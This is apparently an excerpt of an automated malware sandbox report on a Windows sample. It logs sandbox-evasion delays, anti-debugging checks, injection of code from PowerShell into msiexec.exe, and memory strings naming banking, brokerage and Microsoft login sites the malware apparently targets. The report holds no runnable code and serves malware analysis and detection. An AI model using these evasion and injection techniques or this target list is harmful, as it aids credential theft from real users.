          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598563Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598454Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598329Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598204Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598079Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597954Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597829Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597704Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597579Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597454Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597329Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597204Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597079Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596954Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596829Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596704Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596579Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596454Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596329Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596204Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596079Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595930Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595822Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595467Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595079Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594969Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593235Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6321Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3312Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1240Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -28592453314249787s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7472Thread sleep count: 8163 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep count: 39 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7472Thread sleep count: 1638 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -599532s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -599407s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -599282s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -599172s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -599063s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -598938s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -598813s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -598688s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -598563s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -598454s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -598329s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -598204s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -598079s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -597954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -597829s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -597704s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -597579s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -597454s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -597329s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -597204s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -597079s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -596954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -596829s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -596704s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -596579s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -596454s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -596329s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -596204s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -596079s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -595930s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -595822s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -595610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -595467s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -595250s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -595079s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -594969s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -594844s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -594610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -594235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -594110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -593985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -593860s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -593735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -593610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -593485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -593360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep time: -593235s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599172Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598813Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598688Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598563Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598454Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598329Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598204Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598079Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597954Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597829Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597704Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597579Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597454Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597329Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597204Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597079Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596954Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596829Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596704Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596579Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596454Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596329Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596204Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596079Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595930Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595822Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595467Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595079Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594969Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593235Jump to behavior
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: ModuleAnalysisCache.7.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 87h216Snb7.exe, 00000000.00000002.1332402123.0000000000508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Z0*Y
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
          Source: ModuleAnalysisCache.7.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: powershell.exe, 00000007.00000002.1531343909.0000000005095000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: ModuleAnalysisCache.7.drBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000007.00000002.1531343909.0000000005095000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
          Source: powershell.exe, 00000007.00000002.1531343909.0000000005095000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: C:\Users\user\Desktop\87h216Snb7.exeAPI call chain: ExitProcess graph end nodegraph_0-3912
          Source: C:\Users\user\Desktop\87h216Snb7.exeAPI call chain: ExitProcess graph end nodegraph_0-3915
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0062F538 LdrInitializeThunk,LdrInitializeThunk,7_2_0062F538
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 42D0000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
